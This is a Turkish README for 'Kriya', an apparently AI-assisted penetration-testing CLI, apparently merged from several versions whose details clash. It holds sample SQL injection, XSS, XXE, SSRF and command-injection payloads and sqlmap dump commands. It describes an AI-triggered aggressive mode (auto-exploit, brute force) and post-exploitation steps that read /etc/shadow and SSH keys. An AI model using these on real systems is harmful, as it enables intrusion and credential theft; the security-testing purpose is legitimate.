AI-Powered Security Scanner - 11 güvenlik modülü, Google Gemini AI analizi, modüler CLI yapısı
Kriya, web uygulamalarını otomatik olarak test eden, OWASP Top 10 zafiyetlerini bulan ve Google Gemini AI ile akıllı analiz yapan bir otonom penetrasyon test aracıdır.
┌─────────────────────────────────────────────────────────┐
│ 🎯 11 GÜVENLİK MODÜLÜ │
│ • SQL Injection • XSS │
│ • SSRF • XXE │
│ • Command Injection • IDOR │
│ • Port Scanning • Directory Brute Force │
│ • Web Technology • Nikto Scan │
│ • AI Deep Analysis │
│ │
│ 🤖 GOOGLE GEMINI AI │
│ • Otomatik zafiyet analizi │
│ • Exploit önerileri │
│ • PoC kod üretimi │
│ • Risk skorlama │
│ │
│ ⚡ MODÜLER CLI │
│ • Tek tek test çalıştırma │
│ • Tam otonom pentest │
│ • Threading desteği │
│ • Verbose mod │
└─────────────────────────────────────────────────────────┘
📁 Toplam Kod: ~5,723 satır Go
🔧 Backend: ~5,723 satır Go
🔧 Ana Dosya: 1,543 satır (main.go)
🧪 Test Modülü: 11 güvenlik testi
📚 Dokümantasyon: 6 markdown dosyası
🤖 AI Model: Gemini 2.5-flash
⚙️ Bağımlılık: 2 Go package
# Repository'yi klonla
git clone <repo-url>
cd kriya
# API key al (ücretsiz): https://aistudio.google.com/app/apikey
echo 'GEMINI_API_KEY=your-api-key-here' > .env
# Build
go build -o kriya
chmod +x kriya# Yardımı gör
./kriya --help
# Hızlı SQL injection testi
./kriya -t http://testphp.vulnweb.com --sql
# Tam pentest (11 test)
./kriya -t http://testphp.vulnweb.com# Rapor otomatik oluşturulur
cat pentest_report_testphp_vulnweb_com.txtBaşka bir yapay zeka bu projeyi geliştirmek istiyorsa: 👉 AI_DEVELOPER_GUIDE.md - Tam geliştirici rehberi (2,500+ satır)
- MODULES.md - Her modülün detaylı açıklaması
- COMMANDS.md - Tüm komutlar ve örnekler
- QUICKSTART.md - Hızlı referans
- CHANGELOG_v6.md - v6.0 değişiklikleri
- UPGRADE_NOTES.md - Versiyon yükseltme
✅ Go 1.21 veya üzeri
✅ Linux / macOS / Windows
✅ Internet bağlantısı (AI için)
✅ 100MB boş alan
# Debian/Ubuntu
sudo apt install -y nmap nikto gobuster dirb sqlmap whatweb
# Arch Linux
sudo pacman -S nmap nikto gobuster
# macOS
brew install nmap nikto gobuster sqlmap# Linux
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Doğrula
go version # go version go1.21.0 linux/amd64cd kriya
go mod download
go mod tidy# ════════════════════════════════════════════════════════
# YARDIM
# ════════════════════════════════════════════════════════
./kriya --help
# ════════════════════════════════════════════════════════
# TEK MODÜL TESTLERİ
# ════════════════════════════════════════════════════════
# SQL Injection
./kriya -t http://target.com --sql
# XSS (Cross-Site Scripting)
./kriya -t http://target.com --xss
# SSRF (Server-Side Request Forgery)
./kriya -t http://target.com --ssrf
# XXE (XML External Entity)
./kriya -t http://target.com --xxe
# Command Injection
./kriya -t http://target.com --cmdinj
# IDOR (Insecure Direct Object Reference)
./kriya -t http://target.com --idor
# Nmap Port Scan
./kriya -t http://target.com --nmap
# ════════════════════════════════════════════════════════
# ÇOKLU MODÜL
# ════════════════════════════════════════════════════════
# OWASP Top 3
./kriya -t http://target.com --sql --xss --ssrf
# Injection testleri
./kriya -t http://target.com --sql --xss --cmdinj
# Tüm yeni modüller (v6.0)
./kriya -t http://target.com --ssrf --xxe --cmdinj --idor
# ════════════════════════════════════════════════════════
# TAM PENTEST (11 TEST)
# ════════════════════════════════════════════════════════
./kriya -t http://target.com
# ════════════════════════════════════════════════════════
# PERFORMANS OPSİYONLARI
# ════════════════════════════════════════════════════════
# 10 thread ile hızlı test
./kriya -t http://target.com --threads 10
# Verbose mod (detaylı output)
./kriya -t http://target.com -v
# Kombine
./kriya -t http://target.com --sql --threads 10 -v# Hızlı zafiyet tarama
./kriya -t https://bugbounty-target.com --sql --xss --ssrf
# Zafiyet bulunduysa detaylı analiz
./kriya -t https://bugbounty-target.com -v# Staging environment testi
./kriya -t https://staging.myapp.com
# Raporu kaydet
./kriya -t https://myapp.com > security_report_$(date +%Y%m%d).log# REST API zafiyetleri
./kriya -t https://api.target.com --sql --idor --ssrf# Hedef listesi oluştur
cat > targets.txt << EOF
http://target1.com
http://target2.com
http://target3.com
EOF
# Tüm hedefleri tara
while read target; do
echo "Testing: $target"
./kriya -t "$target" --sql --xss
sleep 5
done < targets.txt• Açık portları tespit eder
• Servisleri tanımlar
• Versiyon bilgisi toplar
• Kullanılan framework'ü bulur (PHP, Node.js, vb.)
• Server bilgisi (Apache, Nginx, IIS)
• CMS tespiti (WordPress, Joomla, vb.)
• Bilinen web server zafiyetleri
• Güvenli olmayan konfigürasyonlar
• Eski yazılım versiyonları
• Gizli dizinleri bulur
• Admin panelleri tespit eder
• Backup dosyaları arar
• Error-based injection
• Union-based injection
• Blind SQL injection
• Time-based injection
Örnek Zafiyet:
http://target.com/user?id=1' OR '1'='1
→ Tüm kullanıcılar döner
• Reflected XSS
• Stored XSS
• DOM-based XSS
Örnek Zafiyet:
http://target.com/search?q=<script>alert(1)</script>
→ JavaScript çalışır
• AWS metadata erişimi (169.254.169.254)
• GCP metadata erişimi
• Internal network tarama
• File protocol kullanımı
Örnek Zafiyet:
http://target.com/redirect?url=http://169.254.169.254/latest/meta-data/
→ AWS credentials çalınabilir
• /etc/passwd okuma
• Windows sistem dosyaları
• Source code okuma
• SSRF via XXE
Örnek Zafiyet:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>• OS komut çalıştırma
• Reverse shell
• Time-based detection
• Output-based detection
Örnek Zafiyet:
http://target.com/ping?ip=8.8.8.8; whoami
→ Sistem komutu çalışır
• Yetkilendirme bypass
• Başka kullanıcı verileri erişimi
• ID enumeration
Örnek Zafiyet:
http://target.com/profile?user_id=100 → Kendi profilin
http://target.com/profile?user_id=101 → Başkasının profili
• Tüm bulguları analiz eder
• Exploit chain'leri bulur
• PoC kodları üretir
• Risk skorları verir (0-100)
• Remediation önerileri sunar
[Test Sonuçları]
↓
[Gemini AI 2.5-flash]
↓
┌─────────────────────┐
│ 1. İlk Analiz │ → Zafiyet tespiti
│ 2. Deep Dive │ → Exploit senaryoları
│ 3. PoC Üretimi │ → Kod örnekleri
│ 4. Risk Skorlama │ → 0-100 puan
│ 5. Remediation │ → Çözüm önerileri
└─────────────────────┘
↓
[Final Rapor]
═══════════════════════════════════════════════════════════
🤖 AI ANALİZİ
═══════════════════════════════════════════════════════════
Severity: CRITICAL
Risk Score: 95/100
Zafiyet: SQL Injection
Parametresi: id
Etki: Full database access
Exploitation:
1. Union-based injection kullan
2. Database içeriğini oku: ' UNION SELECT table_name FROM information_schema.tables--
3. Admin hash'ini çek: ' UNION SELECT password FROM users WHERE role='admin'--
4. Hash'i kır veya yeni admin oluştur
PoC Kodu:
```python
import requests
url = "http://target.com/user?id=1' UNION SELECT username,password FROM users--"
response = requests.get(url)
print(response.text) # Tüm kullanıcılar
Remediation:
- Prepared statements kullan
- Input validation ekle
- Least privilege principle uygula
- WAF (Web Application Firewall) ekle
---
## 📊 Proje Yapısı (AI'lar İçin)
kriya/ │ ├── main.go # Ana giriş noktası │ ├── CLI flag parsing # (20-32. satırlar) │ ├── main() fonksiyonu # (34-90. satırlar) │ ├── showHelp() # Yardım ekranı │ ├── runSpecificModules() # Seçili modülleri çalıştır │ └── runFullPentestWithTarget() # 11 testi çalıştır │ ├── llm/ # AI entegrasyonu │ ├── gemini.go # Gemini client │ │ ├── NewGeminiClient() # Client başlatma │ │ ├── Generate() # Prompt gönderme │ │ └── GetAPIKey() # .env'den key alma │ └── iterative.go # İteratif AI analizi │ └── IterativeAnalysis() # 2-aşamalı derin analiz │ ├── utils/ # Test modülleri │ ├── ssrf.go # SSRF testi (142 satır) │ │ ├── TestSSRF() # Ana test fonksiyonu │ │ └── FormatSSRFResults() # Sonuç formatlama │ ├── xxe.go # XXE testi (120 satır) │ ├── cmdinjection.go # Command Injection (150 satır) │ ├── idor.go # IDOR testi (140 satır) │ ├── sqlinjection.go # SQL Injection │ ├── xss.go # XSS testi │ ├── nmap.go # Nmap wrapper │ ├── dirbrute.go # Directory brute force │ ├── webtech.go # Web teknoloji tespiti │ ├── url_helpers.go # URL manipülasyon │ │ ├── FindURLParams() # Parametre bulma │ │ ├── InjectPayload() # Payload enjekte etme │ │ └── ExtractBaseURL() # Base URL çıkarma │ └── helpers.go # Yardımcı fonksiyonlar │ ├── .env # Gemini API key (GİZLİ!) ├── go.mod # Go module tanımları └── go.sum # Dependency checksums
### Kod Metrikler
┌─────────────────────┬────────┐ │ Dosya │ Satır │ ├─────────────────────┼────────┤ │ main.go │ 1,543 │ │ utils/ssrf.go │ 142 │ │ utils/xxe.go │ 120 │ │ utils/cmdinjection │ 150 │ │ utils/idor.go │ 140 │ │ utils/sqlinjection │ 200+ │ │ utils/xss.go │ 180+ │ │ llm/gemini.go │ 100 │ │ llm/iterative.go │ 150+ │ │ Diğer utils │ 2,000+ │ ├─────────────────────┼────────┤ │ TOPLAM │ ~5,723 │ └─────────────────────┴────────┘
---
## 🔧 Yeni Modül Ekleme (AI Geliştiriciler İçin)
### Checklist
☐ 1. utils/newmodule.go oluştur ☐ 2. Result struct tanımla ☐ 3. TestXXX() fonksiyonu yaz ☐ 4. FormatXXXResults() fonksiyonu yaz ☐ 5. main.go'ya flag ekle ☐ 6. showHelp() güncelle ☐ 7. runSpecificModules() ekle ☐ 8. runFullPentestWithTarget() ekle ☐ 9. Build ve test et ☐ 10. Dokümantasyon güncelle
### Örnek: CORS Modülü Ekleme
```go
// 1. utils/cors.go
package utils
type CORSResult struct {
Vulnerable bool
Details []string
}
func TestCORS(targetURL string) CORSResult {
// CORS misconfiguration testi
// ...
}
func FormatCORSResults(result CORSResult) string {
// Sonuç formatlama
// ...
}
// 2. main.go - flag ekle
var corsTest = flag.Bool("cors", false, "Run CORS testing")
// 3. main.go - runSpecificModules() içine ekle
if *corsTest {
fmt.Println("🌐 CORS Testing...")
corsResult := utils.TestCORS(target)
// ...
}
// 4. main.go - runFullPentestWithTarget() içine ekle
fmt.Println("🌐 [12/13] CORS Testing...")
corsResult := utils.TestCORS(target)
// ...
Detaylı rehber: AI_DEVELOPER_GUIDE.md
sudo apt install nmap# .env dosyası oluştur
echo 'GEMINI_API_KEY=your-key' > .env
# API key al: https://aistudio.google.com/app/apikeygo mod download
go mod tidy
go build -o kriya# Thread sayısını azalt
./kriya -t target.com --threads 1
# 1 dakika bekle ve tekrar dene# Go versiyonunu kontrol et
go version # 1.21+ olmalı
# Dependency'leri temizle ve yeniden indir
rm go.sum
go mod tidy
go build -o kriya# Varsayılan (5 thread)
./kriya -t target.com
# Hızlı (10 thread)
./kriya -t target.com --threads 10
# Çok hızlı (20 thread) - DİKKAT: WAF tetikleyebilir
./kriya -t target.com --threads 20# Detaylı log (debugging için)
./kriya -t target.com -v
# Log dosyasına kaydet
./kriya -t target.com -v > debug.log 2>&1┌─────────────────────────────────────────────────────┐
│ ⚠️ SADECE SAHİP OLDUĞUNUZ VEYA İZİN ALDIĞINIZ │
│ SİSTEMLERİ TEST EDİN! │
│ │
│ İzinsiz penetration testing YASADIŞTIR ve │
│ ciddi yasal sonuçları olabilir. │
└─────────────────────────────────────────────────────┘
- Kendi web uygulamanız
- Bug bounty programları
- Authorized penetration testing
- Eğitim amaçlı (izinli ortamlarda)
- Security assessment sözleşmeleri
Kriya kullanıcıları:
- Hedef sistemin sahibinden yazılı izin almalıdır
- Test kapsamını net tanımlamalıdır
- Test zamanlarını belirler ve uymalıdır
- Bulguları güvenli şekilde raporlamalıdır
- Yerel yasalara uygun hareket etmelidir
- AI_DEVELOPER_GUIDE.md - AI'lar için tam rehber (2,500+ satır)
- MODULES.md - Her modülün detayları
- COMMANDS.md - Komut referansı
- QUICKSTART.md - Hızlı başlangıç
- CHANGELOG_v6.md - Versiyon notları
- http://testphp.vulnweb.com - PHP zafiyetleri
- http://testaspnet.vulnweb.com - ASP.NET zafiyetleri
- http://testhtml5.vulnweb.com - HTML5 zafiyetleri
- https://hack.me - Yasal hacking playground
- AI_DEVELOPER_GUIDE.md okuyun
- Fork edin
- Yeni modülü oluşturun
- Test edin
- Pull request gönderin
- Issue açın
- Detaylı açıklama yazın
- Hata mesajlarını ekleyin
- Go versiyonunu belirtin
✨ YENİ MODÜLLER:
• SSRF (Server-Side Request Forgery)
• XXE (XML External Entity)
• Command Injection
• IDOR (Insecure Direct Object Reference)
🔧 İYİLEŞTİRMELER:
• Blog özelliği kaldırıldı
• Modüler CLI sistemi
• Threading desteği
• Verbose mod
• 11 test (7'den artırıldı)
📚 DOKÜMANTASYON:
• AI_DEVELOPER_GUIDE.md (2,500+ satır)
• Tüm modüller dokümante edildi
• 7 test modülü
• Menu-driven interface
• Blog özelliği
• 2-fazlı test sistemi
- 📧 Email: [Eklenecek]
- 💬 Discord: [Eklenecek]
- 🐦 Twitter: [Eklenecek]
- 👨💻 Maintained by: [İsim]
- 🌐 Website: [Eklenecek]
MIT License - Detaylar için LICENSE dosyasına bakın.
// Her modül bağımsız çalışır
type SecurityModule interface {
Test(target string) Result
Format(result Result) string
}// Gemini 2.5-flash
model.SetTemperature(0.7)
model.SetMaxOutputTokens(8192)// Goroutine desteği (planned)
go testModule(target)- CORS Misconfiguration testi
- JWT Token exploitation
- CSRF testing
- GraphQL testing
- WebSocket testing
- Web UI
- Report export (PDF/HTML)
- CI/CD integration
- Docker support
- Plugin system
./kriya -t target.com --sql # Sadece SQL./kriya -t target.com # Tüm testler./kriya -t target.com -v # Verbose./kriya -t target.com --threads 1 # Rate limit friendly🔱 Kriya v6.0
AI-Powered Autonomous Penetration Testing
Made with ❤️ by Security Researchers
════════════════════════════════════════════════════════════════ 🔱 Kriya - Autonomous Penetration Testing ════════════════════════════════════════════════════════════════
📡 [1/11] Nmap Port Scanning... ✓ 3 open ports found
🔍 [2/11] Web Technology Detection... ✓ Apache 2.4.7, PHP 5.6 tespit edildi
🌐 [3/7] Nikto Web Server Taraması... ✓ 12 zafiyet bulundu
📁 [4/7] Directory Brute Force... ✓ 8 gizli dizin bulundu
💉 [5/7] SQL Injection Testi... 🔴 SQL Injection zafiyeti tespit edildi!
🔓 [6/7] XSS Testi... 🔴 2 XSS zafiyeti bulundu
🤖 [7/7] AI Exploit Analizi...
Nasıl Sömürülür:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
# Çıktı: acuart, information_schema
sqlmap -u "..." -D acuart -T users --dump
# Admin credentials çekildiExploit Kodu:
import requests
url = "http://testphp.vulnweb.com/login.php"
payload = "' OR '1'='1"
r = requests.post(url, data={'user': payload, 'pass': 'x'})
# Bypass successful- Karar: HAYIR
- Sebep: SQL injection ve XSS bulundu, risk skoru yeterli (75/100)
### Düşük Risk Hedef (Agresif Mod Aktif)
```bash
./kriya
# 4
Hedef: low-risk-server.local
# PHASE 1
📡 Nmap: 22, 80 açık
🌐 Nikto: 2 düşük risk
💉 SQL: Zafiyet yok
🔓 XSS: Zafiyet yok
📊 Risk Skoru: 18/100
🤖 AI Kararı:
- Risk çok düşük (18/100)
- Kritik zafiyet bulunamadı
- **AGRESİF TESTLER GEREKLİ!**
════════════════════════════════════════════════════════════════
🔥 PHASE 2: AGRESİF TESTLER BAŞLATILIYOR
Sebep: Risk skoru çok düşük (18/100)
AI Önerisi: Daha derin testler gerekli
════════════════════════════════════════════════════════════════
⚠️ AGRESİF TESTLER hedefe ZARAR verebilir! Devam et? [y/N]: y
🎯 [1/5] Metasploit Auto-Exploit...
Testing port 22 (SSH)...
✗ Exploit başarısız
💉 [2/5] SQLMap Agresif Mod...
--level=5 --risk=3 --dump-all
✗ Hala zafiyet yok
🔓 [3/5] Brute Force Saldırıları...
SSH brute force...
🔴 KİMLİK BULUNDU: test:test123
📜 [4/5] Exploit Kodları İndiriliyor...
CVE yoksa atlanıyor
🤖 AI Post-Exploitation Analizi...
## SSH SÖMÜRÜSÜ
### Bulunan Kimlik:
- Kullanıcı: test
- Şifre: test123
### Post-Exploitation:
```bash
# 1. Bağlan
ssh test@low-risk-server.local
# 2. Privilege escalation dene
sudo -l
find / -perm -4000
# 3. Hassas dosyalar
cat /etc/shadow
cat ~/.ssh/id_rsa
# 4. Lateral movement
ssh-copy-id test@other-server
✓ Rapor: reports/full_pentest_low-risk-server_2026-01-30_16-45-00.md 📊 Dosya boyutu: 87 KB
## 📚 Dokümantasyon
- **README.md** - Bu dosya
- **[AGGRESSIVE_MODE_GUIDE.md](AGGRESSIVE_MODE_GUIDE.md)** - Agresif mod detaylı rehber
- **[FULL_PENTEST_GUIDE.md](FULL_PENTEST_GUIDE.md)** - Tam pentest kullanımı
- **[SQL_INJECTION_GUIDE.md](SQL_INJECTION_GUIDE.md)** - SQL injection testleri
- **[METASPLOIT_INTEGRATION.md](METASPLOIT_INTEGRATION.md)** - Metasploit kullanımı
- **[KALI_KURULUM.md](KALI_KURULUM.md)** - Kali Linux'ta kurulum
## 🎯 4 İşlem Modu
### 1. Blog Yazısı (3 AI Agent)
```bash
./kriya → 1
Konu: "Cybersecurity Trends 2026"
# AI 600-800 kelimelik blog yazar
./kriya → 2
Hedef: scanme.nmap.org
# Nmap + ExploitDB + Metasploit komutları./kriya → 3
Hedef: http://testphp.vulnweb.com/listproducts.php?cat=1
# SQLMap ile derin test./kriya → 4
Hedef: target.com
# Phase 1: 7 test + AI analiz
# Phase 2: 5 agresif test (gerekirse)AI veya sistem şu durumlarda agresif mod önerir:
- ✅ Risk skoru < 30
- ✅ Kritik/Yüksek zafiyet yok
- ✅ SQL form var ama zafiyet tespit edilmedi
- ✅ WordPress var ama zafiyet yok
- Metasploit Auto-Exploit - Her port için otomatik exploit dener
- SQLMap Maksimum - --level=5 --risk=3 --dump-all
- Hydra Brute Force - SSH, FTP, HTTP login
- WPScan Agresif - WordPress enumerate all
- ExploitDB Download - CVE'ler için exploit kodu indir
🎯 Metasploit Auto-Exploit:
🔴 SESSION ALINDI! (port 21, vsftpd backdoor)
Shell: root@target:/#
💉 SQLMap Agresif:
🔴 Veritabanı dump edildi!
Database: webapp
Tables: users (150 rows), orders (4500 rows)
Hashes: admin:5f4dcc3b5aa765d61d8327deb882cf99
🔓 Brute Force:
🔴 SSH Kimlik: admin:password123
╔═══════════════════════════════════════════════════════════╗
║ ⚠️ YASAL UYARI - ZORUNLU OKUYUN ⚠️ ║
║ ║
║ Bu araç SADECE şu amaçlar için kullanılabilir: ║
║ ✅ Kendi sistemlerinizi test etmek ║
║ ✅ İzinli penetration testing ║
║ ✅ CTF ve eğitim ortamları ║
║ ✅ Bug bounty programları (izinli) ║
║ ║
║ İZİNSİZ kullanım YASADIDIR ve cezai sorumluluk doğurur ║
║ ║
║ AGRESİF MOD özellikle tehlikelidir: ║
║ • Hedefi çökertebilir ║
║ • Hesapları kilitleyebilir ║
║ • IDS/IPS alarmlarını tetikler ║
║ • Yasal takibata yol açar ║
║ ║
║ KULLANICI SORUMLUDUR! ║
╚═══════════════════════════════════════════════════════════╝
scanme.nmap.org- Nmap içinhttp://testphp.vulnweb.com- SQL, XSS içinhttp://zero.webappsecurity.com- Banking app
# DVWA (Damn Vulnerable Web App)
sudo apt install dvwa
# Metasploitable VM
# OWASP Juice Shop
# WebGoat| Mod | Testler | Süre | CPU | RAM |
|---|---|---|---|---|
| Blog | 3 agent | 1-2 dk | 10% | 30MB |
| Nmap | 4 agent | 3-5 dk | 20% | 40MB |
| SQL | 4 agent | 5-10 dk | 30% | 60MB |
| Phase 1 | 7 test | 10-15 dk | 40% | 80MB |
| Phase 2 | 5 agresif | +15-30 dk | 60% | 150MB |
| TOPLAM | 12 test | 25-45 dk | 50% | 150MB |
main.go (1014 satır)
├── Blog Writer (runBlogWriter)
├── Security Scanner (runSecurityScanner)
├── SQL Injection (runSQLInjectionTest)
└── Full Pentest (runFullPentest)
├── Phase 1: Normal Tests
│ ├── Nmap
│ ├── WebTech
│ ├── Nikto
│ ├── DirBrute
│ ├── SQLMap
│ ├── XSS
│ └── AI Analysis
├── AI Decision Engine
│ ├── Risk Score Calculation
│ ├── Aggressive Mode Decision
│ └── Phase 2 Trigger
└── Phase 2: Aggressive Tests (optional)
├── Metasploit Auto-Exploit
├── SQLMap --level=5 --risk=3
├── Hydra Brute Force
├── WPScan Aggressive
├── ExploitDB Code Fetch
└── AI Post-Exploitation Analysis
- Toplam: 3,600+ satır Go kodu
- main.go: 1,014 satır
- utils/: 2,100+ satır (10 dosya)
- agents/: 50 satır
- tasks/: 100 satır
- Blog: Araştırmacı, Yazar, Editör
- Security: Nmap Tarayıcı, Versiyon Dedektörü, Exploit Arayıcı, Güvenlik Analisti
- SQL: Web Tarayıcı, SQL Tester, Payload Üretici, DB Analisti
- Pentest: Web Scanner, XSS Tester, Dir Bruteforcer, Tech Detector, Orchestrator
- Aggressive: Auto-Exploiter, Brute Forcer, Post-Exploit Analyst
# Yeni bir hedefe bakıyorsunuz
./kriya → 2 → scanme.nmap.org
# Hızlıca portlar ve servisler# Bir web uygulaması test edeceksiniz
./kriya → 4 → https://webapp.local
# Phase 1: SQL, XSS, Nikto, Dir scan
# AI: Yeterli bulgular (risk: 65/100)
# Rapor hazır# İlk tarama yetersiz kaldı
./kriya → 4 → target.local
# Phase 1: Düşük bulgular (risk: 25/100)
# AI: "Agresif mod gerekli!"
# Phase 2: Brute force, auto-exploit
# SSH kimliği bulundu!# CTF makinesini çözmek için
./kriya → 4 → 10.10.10.123
# Tüm testler çalışır
# AI exploit kodları verir
# Flag bulunur!Bu proje eğitim amaçlıdır. Geliştirme önerileri:
- Parallel test execution
- Web dashboard
- PDF rapor export
- Custom wordlist desteği
- Exploit başarı tracking
- OWASP Top 10 mapping
Educational Use Only - Eğitim amaçlıdır
ra + GitHub Copilot işbirliği ile geliştirilmiştir.
# 1. Klonla
git clone <repo> && cd kriya
# 2. API key
echo 'GEMINI_API_KEY=your-key' > .env
# 3. Compile
go build -o kriya
# 4. İlk test
./kriya
# 2 seç → scanme.nmap.org
# 5. Tam pentest
./kriya
# 4 seç → http://testphp.vulnweb.com
# 🎉 Hazırsın!Major Feature: 2-Fazlı Agresif Penetration Testing
AI Model: Google Gemini 2.5 Flash
⭐ Star vererek destekle!